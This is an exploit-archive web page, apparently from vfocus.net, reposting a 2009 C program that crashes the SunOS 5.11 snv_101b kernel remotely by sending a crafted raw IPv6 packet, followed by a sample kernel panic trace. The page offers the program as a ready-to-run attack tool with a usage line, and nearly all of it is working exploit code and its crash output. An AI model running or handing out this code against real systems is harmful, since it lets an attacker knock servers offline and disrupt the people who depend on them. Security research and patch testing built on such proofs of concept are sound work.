首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SunOS Release 5.11 Version snv_101b Remote IPV6 Crash Exploit
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02  
/*
	SunOS Release 5.11 Version snv_101b Remote IPV6 
	Kernel Crash Exploit 0day
	By Kingcope/2009
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

unsigned char rawData[] =
"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
"\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
"\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";

int main(int argc, char *argv[])
{
  struct sockaddr_in6 dst;
  int s;

  if (argc < 2)
  {
    printf("SunOS Release 5.11 Version snv_101b Remote IPV6 Kernel Crash Exploit 0day By Kingcope/2009\n");
    printf("Usage: %s <dst>\n", *argv);
    return(1);
  }

  memset(&dst, 0, sizeof(dst));
  if (inet_pton(AF_INET6, (char *)argv[1], (struct in6_addr *) &dst.sin6_addr) != 1) {
	printf("Error: inet_pton()\n");
	exit(-1);
	}
	memcpy(rawData+24, &dst.sin6_addr, 16);

  dst.sin6_family = AF_INET6;

  s = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);

  printf("Sending IPV6 packet: %s\n", argv[1]);

  if (sendto(s,&rawData,sizeof(rawData),0,(struct sockaddr*)&dst,sizeof(dst)) == -1)
  {
	perror("Error sending packet");
	exit(-1);
  }

  return(0);
}

/*
Kernel Crash Dump May Look Like The Following Snippet
[ID 965332 kern.notice] ipsec_needs_processing_v6
[ID 100000 kern.notice]
[ID 655072 kern.notice] ffffff00012b9650 ip:ipsec_needs_processing_v6+10c ()
[ID 655072 kern.notice] ffffff00012b96f0 ip:ipsec_early_ah_v6+75 ()
[ID 655072 kern.notice] ffffff00012b9860 ip:ip_rput_data_v6+f4e ()
[ID 655072 kern.notice] ffffff00012b9940 ip:ip_rput_v6+64e ()
[ID 655072 kern.notice] ffffff00012b99b0 unix:putnext+21e ()
[ID 655072 kern.notice] ffffff00012b9a00 dld:dld_str_rx_fastpath+8a ()
[ID 655072 kern.notice] ffffff00012b9ad0 dls:i_dls_link_rx+2c7 ()
[ID 655072 kern.notice] ffffff00012b9b50 mac:mac_do_rx+b7 ()
[ID 655072 kern.notice] ffffff00012b9b80 mac:mac_rx+1f ()
[ID 655072 kern.notice] ffffff00012b9bd0 e1000g:e1000g_intr+135 ()
[ID 655072 kern.notice] ffffff00012b9c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ffffff00012b9c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ffffff00012c5870 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ffffff00012c58c0 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ffffff00012c58d0 unix:cmnint+ba ()
[ID 655072 kern.notice] ffffff00012c5a00 unix:ddi_mem_putb+f ()
[ID 655072 kern.notice] ffffff00012c5a40 ata:ata_disk_start_dma_out+88 ()
[ID 655072 kern.notice] ffffff00012c5a90 ata:ata_ctlr_fsm+1fb ()
[ID 655072 kern.notice] ffffff00012c5af0 ata:ata_hba_start+84 ()
[ID 655072 kern.notice] ffffff00012c5b30 ata:ghd_waitq_process_and_mutex_hold+df ()
[ID 655072 kern.notice] ffffff00012c5ba0 ata:ghd_intr+8d ()
[ID 655072 kern.notice] ffffff00012c5bd0 ata:ata_intr+27 ()
[ID 655072 kern.notice] ffffff00012c5c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ffffff00012c5c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ffffff0001205ab0 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ffffff0001205b00 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ffffff0001205b10 unix:cmnint+ba ()
[ID 655072 kern.notice] ffffff0001205c00 unix:mach_cpu_idle+b ()
[ID 655072 kern.notice] ffffff0001205c40 unix:cpu_idle+17b ()
[ID 655072 kern.notice] ffffff0001205c60 unix:idle+4c ()
[ID 655072 kern.notice] ffffff0001205c70 unix:thread_start+8 ()
[ID 100000 kern.notice]
[ID 672855 kern.notice] syncing file systems...
[ID 904073 kern.notice]  done
[ID 111219 kern.notice] dumping to /dev/zvol/dsk/rpool/dump, offset 65536, content: kernel
[ID 409368 kern.notice] ^M100% done: 56726 pages dumped, compression ratio 3.59,
[ID 851671 kern.notice] dump succeeded
[ID 540533 kern.notice] ^MSunOS Release 5.11 Version snv_101b 64-bit
[ID 172908 kern.notice] Copyright 1983-2008 Sun Microsystems, Inc.  All rights reserved.
*/

// [2009-01-26]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EPOLL SYSTEM 3.1 (password.dat
·Simple Machines Forum <= 1.1.7
·OpenGoo 1.1 (script_class) Loc
·ITLPoll 2.7 Stable2 (index.php
·Flax Article Manager 1.1 (cat_
·FlexCell Grid Control 5.6.9 Re
·Web-Calendar Lite 1.0 (Auth By
·MW6 Barcode ActiveX (Barcode.d
·Mambo com_sim v0.8 Blind SQL I
·HtmlCapture ActiveX Control 2.
·MemHT Portal <= 4.0.1 (avatar)
·NCTVideoStudio ActiveX DLLs 1.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved